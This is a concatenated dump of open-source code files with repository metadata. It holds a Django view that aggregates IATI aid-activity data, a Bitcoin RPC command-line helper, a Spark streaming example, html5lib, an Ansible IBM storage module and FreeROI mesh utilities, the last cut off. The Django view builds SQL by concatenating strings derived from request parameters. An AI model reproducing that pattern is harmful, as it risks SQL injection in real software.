'total-budget': {'select': 'a.total_budget', 'type': 'sum', 'from_addition': ''},
# 'recipient-country': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'recipient-region': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'year': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
# 'sector': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
}
group_by_element_dict = {
'recipient-country': {'select': 'rc.country_id', 'from_addition': 'JOIN iati_activityrecipientcountry as rc on a.id = rc.activity_id '},
'recipient-region': {'select': 'rr.region_id', 'from_addition': 'JOIN iati_activityrecipientregion as rr on a.id = rr.activity_id '},
'year': {'select': 'YEAR('+group_field+')', 'from_addition': ''},
'sector': {'select': 'acts.sector_id', 'from_addition': 'JOIN iati_activitysector as acts on a.id = acts.activity_id '},
'reporting-org': {'select': 'a.reporting_organisation_id', 'from_addition': 'JOIN iati_organisation as o on a.reporting_organisation_id = o.code '},
'participating-org': {'select': 'po.name', 'from_addition': 'JOIN iati_activityparticipatingorganisation as po on a.id = po.activity_id '},
'policy-marker': {'select': 'pm.policy_marker_id', 'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
}
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), content_type='application/json')
helper = CustomCallHelper()
cursor = connection.cursor()
# get filters
reporting_organisations = helper.get_and_query(request, 'reporting_organisation__in', 'a.reporting_organisation_id')
recipient_countries = helper.get_and_query(request, 'countries__in', 'rc.country_id')
recipient_regions = helper.get_and_query(request, 'regions__in', 'rr.region_id')
total_budgets = helper.get_and_query(request, 'total_budget__in', 'a.total_budget')
sectors = helper.get_and_query(request, 'sectors__in', 'acts.sector_id')
if aggregation_key in aggregation_element_dict:
aggregation_info = aggregation_element_dict[aggregation_key]
aggregation_key = aggregation_info["select"]
aggregation_type = aggregation_info["type"]
aggregation_from_addition = aggregation_info["from_addition"]
aggregation_where_addition = ""
if "where_addition" in aggregation_info:
aggregation_where_addition = aggregation_info["where_addition"]
else:
return HttpResponse(ujson.dumps({"error": "Invalid aggregation key, see included list for viable keys.","valid_aggregation_keys": list(aggregation_element_dict.keys())}), content_type='application/json')
if group_by_key in group_by_element_dict:
group_by_info = group_by_element_dict[group_by_key]
group_select = group_by_info["select"]
group_from_addition = group_by_info["from_addition"]
else:
return HttpResponse(ujson.dumps({"error": "Invalid group by key, see included list for viable keys.","valid_group_by_keys": list(group_by_element_dict.keys())}), content_type='application/json')
# make sure group key and aggregation key are set
if not group_by_key:
return HttpResponse(ujson.dumps("No field to group by. add parameter group_by (country/region/etc.. see docs)"), content_type='application/json')
if not aggregation_key:
return HttpResponse(ujson.dumps("No field to aggregate on. add parameter aggregation_key (iati-identifier/reporting-org/etc.. see docs)"), content_type='application/json')
#create the query
query_select = 'SELECT '+aggregation_type+'(' + aggregation_key + ') as aggregation_field, ' + group_select + ' as group_field, o.name as org_name '
query_from = 'FROM iati_activity as a ' + aggregation_from_addition + group_from_addition
query_where = 'WHERE 1 ' + aggregation_where_addition
query_group_by = 'GROUP BY ' + group_select
# fill where part
filter_string = 'AND (' + reporting_organisations + recipient_countries + recipient_regions + total_budgets + sectors + ')'
if filter_string == 'AND ()':
filter_string = ""
else:
if 'AND ()' in filter_string:
filter_string = filter_string[:-6]
query_where += filter_string
# optimalisation for simple (all) queries
if not filter_string and query_from == 'FROM iati_activity as a ':
if(group_by_key == "country"):
query_select = 'SELECT count(activity_id) as aggregation_field, country_id as group_field '
query_from = "FROM iati_activityrecipientcountry "
query_group_by = "GROUP BY country_id"
elif(group_by_key == "region"):
query_select = 'SELECT count(activity_id) as aggregation_field, region_id as group_field '
query_from = "FROM iati_activityrecipientregion "
query_group_by = "GROUP BY region_id"
elif(group_by_key == "sector"):
query_select = 'SELECT count(activity_id) as aggregation_field, sector_id as group_field '
query_from = "FROM iati_activitysector "
query_group_by = "GROUP BY sector_id"
# execute query
cursor.execute(query_select + query_from + query_where + query_group_by)
results1 = helper.get_fields(cursor=cursor)
# query result -> json output
options = {}
for r in results1:
options[r['group_field']] = [r['aggregation_field'], r['org_name']]
return HttpResponse(ujson.dumps(options), content_type='application/json')
| agpl-3.0 |
pleasecoin/pls | contrib/bitrpc/bitrpc.py | 2348 | 7835 | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:8332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:8332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Bitcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Bitcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | mit |
alunarbeach/spark | examples/src/main/python/streaming/network_wordcount.py | 85 | 1915 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Counts words in UTF8 encoded, '\n' delimited text received from the network every second.
Usage: network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Spark Streaming would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/streaming/network_wordcount.py localhost 9999`
"""
from __future__ import print_function
import sys
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: network_wordcount.py <hostname> <port>", file=sys.stderr)
exit(-1)
sc = SparkContext(appName="PythonStreamingNetworkWordCount")
ssc = StreamingContext(sc, 1)
lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2]))
counts = lines.flatMap(lambda line: line.split(" "))\
.map(lambda word: (word, 1))\
.reduceByKey(lambda a, b: a+b)
counts.pprint()
ssc.start()
ssc.awaitTermination()
| apache-2.0 |
rogerscristo/BotFWD | env/lib/python3.6/site-packages/pip/_vendor/html5lib/treewalkers/base.py | 355 | 4939 | from __future__ import absolute_import, division, unicode_literals
from xml.dom import Node
from ..constants import namespaces, voidElements, spaceCharacters
__all__ = ["DOCUMENT", "DOCTYPE", "TEXT", "ELEMENT", "COMMENT", "ENTITY", "UNKNOWN",
"TreeWalker", "NonRecursiveTreeWalker"]
DOCUMENT = Node.DOCUMENT_NODE
DOCTYPE = Node.DOCUMENT_TYPE_NODE
TEXT = Node.TEXT_NODE
ELEMENT = Node.ELEMENT_NODE
COMMENT = Node.COMMENT_NODE
ENTITY = Node.ENTITY_NODE
UNKNOWN = "<#UNKNOWN#>"
spaceCharacters = "".join(spaceCharacters)
class TreeWalker(object):
def __init__(self, tree):
self.tree = tree
def __iter__(self):
raise NotImplementedError
def error(self, msg):
return {"type": "SerializeError", "data": msg}
def emptyTag(self, namespace, name, attrs, hasChildren=False):
yield {"type": "EmptyTag", "name": name,
"namespace": namespace,
"data": attrs}
if hasChildren:
yield self.error("Void element has children")
def startTag(self, namespace, name, attrs):
return {"type": "StartTag",
"name": name,
"namespace": namespace,
"data": attrs}
def endTag(self, namespace, name):
return {"type": "EndTag",
"name": name,
"namespace": namespace}
def text(self, data):
data = data
middle = data.lstrip(spaceCharacters)
left = data[:len(data) - len(middle)]
if left:
yield {"type": "SpaceCharacters", "data": left}
data = middle
middle = data.rstrip(spaceCharacters)
right = data[len(middle):]
if middle:
yield {"type": "Characters", "data": middle}
if right:
yield {"type": "SpaceCharacters", "data": right}
def comment(self, data):
return {"type": "Comment", "data": data}
def doctype(self, name, publicId=None, systemId=None):
return {"type": "Doctype",
"name": name,
"publicId": publicId,
"systemId": systemId}
def entity(self, name):
return {"type": "Entity", "name": name}
def unknown(self, nodeType):
return self.error("Unknown node type: " + nodeType)
class NonRecursiveTreeWalker(TreeWalker):
def getNodeDetails(self, node):
raise NotImplementedError
def getFirstChild(self, node):
raise NotImplementedError
def getNextSibling(self, node):
raise NotImplementedError
def getParentNode(self, node):
raise NotImplementedError
def __iter__(self):
currentNode = self.tree
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
hasChildren = False
if type == DOCTYPE:
yield self.doctype(*details)
elif type == TEXT:
for token in self.text(*details):
yield token
elif type == ELEMENT:
namespace, name, attributes, hasChildren = details
if (not namespace or namespace == namespaces["html"]) and name in voidElements:
for token in self.emptyTag(namespace, name, attributes,
hasChildren):
yield token
hasChildren = False
else:
yield self.startTag(namespace, name, attributes)
elif type == COMMENT:
yield self.comment(details[0])
elif type == ENTITY:
yield self.entity(details[0])
elif type == DOCUMENT:
hasChildren = True
else:
yield self.unknown(details[0])
if hasChildren:
firstChild = self.getFirstChild(currentNode)
else:
firstChild = None
if firstChild is not None:
currentNode = firstChild
else:
while currentNode is not None:
details = self.getNodeDetails(currentNode)
type, details = details[0], details[1:]
if type == ELEMENT:
namespace, name, attributes, hasChildren = details
if (namespace and namespace != namespaces["html"]) or name not in voidElements:
yield self.endTag(namespace, name)
if self.tree is currentNode:
currentNode = None
break
nextSibling = self.getNextSibling(currentNode)
if nextSibling is not None:
currentNode = nextSibling
break
else:
currentNode = self.getParentNode(currentNode)
| mit |
thnee/ansible | lib/ansible/modules/storage/ibm/ibm_sa_host.py | 61 | 3264 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 IBM CORPORATION
# Author(s): Tzur Eliyahu <tzure@il.ibm.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: ibm_sa_host
short_description: Adds hosts to or removes them from IBM Spectrum Accelerate Family storage systems.
version_added: "2.7"
description:
- "This module adds hosts to or removes them from IBM Spectrum Accelerate Family storage systems."
options:
host:
description:
- Host name.
required: true
state:
description:
- Host state.
required: true
default: "present"
choices: [ "present", "absent" ]
cluster:
description:
- The name of the cluster to include the host.
required: false
domain:
description:
- The domains the cluster will be attached to.
To include more than one domain,
separate domain names with commas.
To include all existing domains, use an asterisk ("*").
required: false
iscsi_chap_name:
description:
- The host's CHAP name identifier
required: false
iscsi_chap_secret:
description:
- The password of the initiator used to
authenticate to the system when CHAP is enable
required: false
extends_documentation_fragment:
- ibm_storage
author:
- Tzur Eliyahu (@tzure)
'''
EXAMPLES = '''
- name: Define new host.
ibm_sa_host:
host: host_name
state: present
username: admin
password: secret
endpoints: hostdev-system
- name: Delete host.
ibm_sa_host:
host: host_name
state: absent
username: admin
password: secret
endpoints: hostdev-system
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ibm_sa_utils import execute_pyxcli_command, \
connect_ssl, spectrum_accelerate_spec, is_pyxcli_installed
def main():
argument_spec = spectrum_accelerate_spec()
argument_spec.update(
dict(
state=dict(default='present', choices=['present', 'absent']),
host=dict(required=True),
cluster=dict(),
domain=dict(),
iscsi_chap_name=dict(),
iscsi_chap_secret=dict()
)
)
module = AnsibleModule(argument_spec)
is_pyxcli_installed(module)
xcli_client = connect_ssl(module)
host = xcli_client.cmd.host_list(
host=module.params['host']).as_single_element
state = module.params['state']
state_changed = False
if state == 'present' and not host:
state_changed = execute_pyxcli_command(
module, 'host_define', xcli_client)
elif state == 'absent' and host:
state_changed = execute_pyxcli_command(
module, 'host_delete', xcli_client)
module.exit_json(changed=state_changed)
if __name__ == '__main__':
main()
| gpl-3.0 |
sunshineDrizzle/FreeROI | froi/algorithm/meshtool.py | 2 | 36643 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
import os
import subprocess
import numpy as np
from scipy import sparse
from scipy.spatial.distance import cdist, pdist
from scipy.stats import pearsonr
def _fast_cross_3d(x, y):
"""Compute cross product between list of 3D vectors
Much faster than np.cross() when the number of cross products
becomes large (>500). This is because np.cross() methods become
less memory efficient at this stage.
Parameters
----------
x : array
Input array 1.
y : array
Input array 2.
Returns
-------
z : array
Cross product of x and y.
Notes
-----
x and y must both be 2D row vectors. One must have length 1, or both
lengths must match.
"""
assert x.ndim == 2
assert y.ndim == 2
assert x.shape[1] == 3
assert y.shape[1] == 3
assert (x.shape[0] == 1 or y.shape[0] == 1) or x.shape[0] == y.shape[0]
if max([x.shape[0], y.shape[0]]) >= 500:
return np.c_[x[:, 1] * y[:, 2] - x[:, 2] * y[:, 1],
x[:, 2] * y[:, 0] - x[:, 0] * y[:, 2],
x[:, 0] * y[:, 1] - x[:, 1] * y[:, 0]]
else:
return np.cross(x, y)
def compute_normals(rr, tris):
"""Efficiently compute vertex normals for triangulated surface"""
# first, compute triangle normals
r1 = rr[tris[:, 0], :]
r2 = rr[tris[:, 1], :]
r3 = rr[tris[:, 2], :]
tri_nn = _fast_cross_3d((r2 - r1), (r3 - r1))
# Triangle normals and areas
size = np.sqrt(np.sum(tri_nn * tri_nn, axis=1))
zidx = np.where(size == 0)[0]
# prevent ugly divide-by-zero
size[zidx] = 1.0
tri_nn /= size[:, np.newaxis]
npts = len(rr)
# the following code replaces this, but is faster (vectorized):
#
# for p, verts in enumerate(tris):
# nn[verts, :] += tri_nn[p, :]
#
nn = np.zeros((npts, 3))
# note this only loops 3x (number of verts per tri)
for verts in tris.T:
for idx in range(3): # x, y, z
nn[:, idx] += np.bincount(verts, tri_nn[:, idx], minlength=npts)
size = np.sqrt(np.sum(nn * nn, axis=1))
# prevent ugly divide-by-zero
size[size == 0] = 1.0
nn /= size[:, np.newaxis]
return nn
def find_closest_vertices(surface_coords, point_coords):
"""Return the vertices on a surface mesh closest to some
given coordinates.
The distance metric used is Euclidian distance.
Parameters
----------
surface_coords : numpy array
Array of coordinates on a surface mesh
point_coords : numpy array
Array of coordinates to map to vertices
Returns
-------
closest_vertices : numpy array
Array of mesh vertex ids
"""
point_coords = np.atleast_2d(point_coords)
return np.argmin(cdist(surface_coords, point_coords), axis=0)
def tal_to_mni(coords):
"""Convert Talairach coords to MNI using the Lancaster transform.
Parameters
----------
coords : n x 3 numpy array
Array of Talairach coordinates
Returns
-------
mni_coords : n x 3 numpy array
Array of coordinates converted to MNI space
"""
coords = np.atleast_2d(coords)
xfm = np.array([[1.06860, -0.00396, 0.00826, 1.07816],
[0.00640, 1.05741, 0.08566, 1.16824],
[-0.01281, -0.08863, 1.10792, -4.17805],
[0.00000, 0.00000, 0.00000, 1.00000]])
mni_coords = np.dot(np.c_[coords, np.ones(coords.shape[0])], xfm.T)[:, :3]
return mni_coords
def mesh_edges(faces):
"""
Returns sparse matrix with edges as an adjacency matrix
Parameters
----------
faces : array of shape [n_triangles x 3]
The mesh faces
Returns
-------
edges : sparse matrix
The adjacency matrix
"""
npoints = np.max(faces) + 1
nfaces = len(faces)
a, b, c = faces.T
edges = sparse.coo_matrix((np.ones(nfaces), (a, b)),
shape=(npoints, npoints))
edges = edges + sparse.coo_matrix((np.ones(nfaces), (b, c)),
shape=(npoints, npoints))
edges = edges + sparse.coo_matrix((np.ones(nfaces), (c, a)),
shape=(npoints, npoints))
edges = edges + edges.T
edges = edges.tocoo()
return edges
def create_color_lut(cmap, n_colors=256):
"""Return a colormap suitable for setting as a Mayavi LUT.
Parameters
----------
cmap : string, list of colors, n x 3 or n x 4 array
Input colormap definition. This can be the name of a matplotlib
colormap, a list of valid matplotlib colors, or a suitable
mayavi LUT (possibly missing the alpha channel).
n_colors : int, optional
Number of colors in the resulting LUT. This is ignored if cmap
is a 2d array.
Returns
-------
lut : n_colors x 4 integer array
Color LUT suitable for passing to mayavi
"""
if isinstance(cmap, np.ndarray):
if np.ndim(cmap) == 2:
if cmap.shape[1] == 4:
# This looks likes a LUT that's ready to go
lut = cmap.astype(np.int)
elif cmap.shape[1] == 3:
# This looks like a LUT, but it's missing the alpha channel
alpha = np.ones(len(cmap), np.int) * 255
lut = np.c_[cmap, alpha]
return lut
# Otherwise, we're going to try and use matplotlib to create it
if cmap in dir(cm):
# This is probably a matplotlib colormap, so build from that
# The matplotlib colormaps are a superset of the mayavi colormaps
# except for one or two cases (i.e. blue-red, which is a crappy
# rainbow colormap and shouldn't be used for anything, although in
# its defense it's better than "Jet")
cmap = getattr(cm, cmap)
elif np.iterable(cmap):
# This looks like a list of colors? Let's try that.
colors = list(map(mpl.colors.colorConverter.to_rgb, cmap))
cmap = mpl.colors.LinearSegmentedColormap.from_list("_", colors)
else:
# If we get here, it's a bad input
raise ValueError("Input %s was not valid for making a lut" % cmap)
# Convert from a matplotlib colormap to a lut array
lut = (cmap(np.linspace(0, 1, n_colors)) * 255).astype(np.int)
return lut
def smoothing_matrix(vertices, adj_mat, smoothing_steps=20, verbose=None):
"""Create a smoothing matrix which can be used to interpolate data defined
for a subset of vertices onto mesh with an adjancency matrix given by
adj_mat.
If smoothing_steps is None, as many smoothing steps are applied until
the whole mesh is filled with with non-zeros. Only use this option if
the vertices correspond to a subsampled version of the mesh.
Parameters
----------
vertices : 1d array
vertex indices
adj_mat : sparse matrix
N x N adjacency matrix of the full mesh
smoothing_steps : int or None
number of smoothing steps (Default: 20)
verbose : bool, str, int, or None
If not None, override default verbose level (see surfer.verbose).
Returns
-------
smooth_mat : sparse matrix
smoothing matrix with size N x len(vertices)
"""
from scipy import sparse
logger.info("Updating smoothing matrix, be patient..")
e = adj_mat.copy()
e.data[e.data == 2] = 1
n_vertices = e.shape[0]
e = e + sparse.eye(n_vertices, n_vertices)
idx_use = vertices
smooth_mat = 1.0
n_iter = smoothing_steps if smoothing_steps is not None else 1000
for k in range(n_iter):
e_use = e[:, idx_use]
data1 = e_use * np.ones(len(idx_use))
idx_use = np.where(data1)[0]
scale_mat = sparse.dia_matrix((1 / data1[idx_use], 0),
shape=(len(idx_use), len(idx_use)))
smooth_mat = scale_mat * e_use[idx_use, :] * smooth_mat
logger.info("Smoothing matrix creation, step %d" % (k + 1))
if smoothing_steps is None and len(idx_use) >= n_vertices:
break
# Make sure the smoothing matrix has the right number of rows
# and is in COO format
smooth_mat = smooth_mat.tocoo()
smooth_mat = sparse.coo_matrix((smooth_mat.data,
(idx_use[smooth_mat.row],
smooth_mat.col)),
shape=(n_vertices,
len(vertices)))
return smooth_mat
def coord_to_label(subject_id, coord, label, hemi='lh', n_steps=30,
map_surface='white', coord_as_vert=False, verbose=None):
"""Create label from MNI coordinate
Parameters
----------
subject_id : string
Use if file is in register with subject's orig.mgz
coord : numpy array of size 3 | int
One coordinate in MNI space or the vertex index.
label : str
Label name
hemi : [lh, rh]
Hemisphere target
n_steps : int
Number of dilation iterations
map_surface : str
The surface name used to find the closest point
coord_as_vert : bool
whether the coords parameter should be interpreted as vertex ids
verbose : bool, str, int, or None
If not None, override default verbose level (see surfer.verbose).
"""
geo = Surface(subject_id, hemi, map_surface)
geo.load_geometry()
if coord_as_vert:
coord = geo.coords[coord]
n_vertices = len(geo.coords)
adj_mat = mesh_edges(geo.faces)
foci_vtxs = find_closest_vertices(geo.coords, [coord])
data = np.zeros(n_vertices)
data[foci_vtxs] = 1.
smooth_mat = smoothing_matrix(np.arange(n_vertices), adj_mat, 1)
for _ in range(n_steps):
data = smooth_mat * data
idx = np.where(data.ravel() > 0)[0]
# Write label
label_fname = label + '-' + hemi + '.label'
logger.info("Saving label : %s" % label_fname)
f = open(label_fname, 'w')
f.write('#label at %s from subject %s\n' % (coord, subject_id))
f.write('%d\n' % len(idx))
for i in idx:
x, y, z = geo.coords[i]
f.write('%d %f %f %f 0.000000\n' % (i, x, y, z))
def _get_subjects_dir(subjects_dir=None, raise_error=True):
"""Get the subjects directory from parameter or environment variable
Parameters
----------
subjects_dir : str | None
The subjects directory.
raise_error : bool
If True, raise a ValueError if no value for SUBJECTS_DIR can be found
or the corresponding directory does not exist.
Returns
-------
subjects_dir : str
The subjects directory. If the subjects_dir input parameter is not
None, its value will be returned, otherwise it will be obtained from
the SUBJECTS_DIR environment variable.
"""
if subjects_dir is None:
subjects_dir = os.environ.get("SUBJECTS_DIR", "")
if not subjects_dir and raise_error:
raise ValueError('The subjects directory has to be specified '
'using the subjects_dir parameter or the '
'SUBJECTS_DIR environment variable.')
if raise_error and not os.path.exists(subjects_dir):
raise ValueError('The subjects directory %s does not exist.'
% subjects_dir)
return subjects_dir
def has_fsaverage(subjects_dir=None):
"""Determine whether the user has a usable fsaverage"""
fs_dir = os.path.join(_get_subjects_dir(subjects_dir, False), 'fsaverage')
if not os.path.isdir(fs_dir):
return False
if not os.path.isdir(os.path.join(fs_dir, 'surf')):
return False
return True
requires_fsaverage = np.testing.dec.skipif(not has_fsaverage(),
'Requires fsaverage subject data')
# --- check ffmpeg
def has_ffmpeg():
"""Test whether the FFmpeg is available in a subprocess
Returns
-------
ffmpeg_exists : bool
True if FFmpeg can be successfully called, False otherwise.
"""
try:
subprocess.call(["ffmpeg"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
return True
except OSError:
return False
def assert_ffmpeg_is_available():
"Raise a RuntimeError if FFmpeg is not in the PATH"
if not has_ffmpeg():
err = ("FFmpeg is not in the path and is needed for saving "
"movies. Install FFmpeg and try again. It can be "
"downlaoded from http://ffmpeg.org/download.html.")
raise RuntimeError(err)
requires_ffmpeg = np.testing.dec.skipif(not has_ffmpeg(), 'Requires FFmpeg')
def ffmpeg(dst, frame_path, framerate=24, codec='mpeg4', bitrate='1M'):
"""Run FFmpeg in a subprocess to convert an image sequence into a movie
Parameters
----------
dst : str
Destination path. If the extension is not ".mov" or ".avi", ".mov" is
added. If the file already exists it is overwritten.
frame_path : str
Path to the source frames (with a frame number field like '%04d').
framerate : float
Framerate of the movie (frames per second, default 24).
codec : str | None
Codec to use (default 'mpeg4'). If None, the codec argument is not
forwarded to ffmpeg, which preserves compatibility with very old
versions of ffmpeg
bitrate : str | float
Bitrate to use to encode movie. Can be specified as number (e.g.
64000) or string (e.g. '64k'). Default value is 1M
Notes
-----
Requires FFmpeg to be in the path. FFmpeg can be downlaoded from `here
<http://ffmpeg.org/download.html>`_. Stdout and stderr are written to the
logger. If the movie file is not created, a RuntimeError is raised.
"""
assert_ffmpeg_is_available()
# find target path
dst = os.path.expanduser(dst)
dst = os.path.abspath(dst)
root, ext = os.path.splitext(dst)
dirname = os.path.dirname(dst)
if ext not in ['.mov', '.avi']:
dst += '.mov'
if os.path.exists(dst):
os.remove(dst)
elif not os.path.exists(dirname):
os.mkdir(dirname)
frame_dir, frame_fmt = os.path.split(frame_path)
# make the movie
cmd = ['ffmpeg', '-i', frame_fmt, '-r', str(framerate),
'-b:v', str(bitrate)]
if codec is not None:
cmd += ['-c', codec]
cmd += [dst]
logger.info("Running FFmpeg with command: %s", ' '.join(cmd))
sp = subprocess.Popen(cmd, cwd=frame_dir, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# log stdout and stderr
stdout, stderr = sp.communicate()
std_info = os.linesep.join(("FFmpeg stdout", '=' * 25, stdout))
logger.info(std_info)
if stderr.strip():
err_info = os.linesep.join(("FFmpeg stderr", '=' * 27, stderr))
# FFmpeg prints to stderr in the absence of an error
logger.info(err_info)
# check that movie file is created
if not os.path.exists(dst):
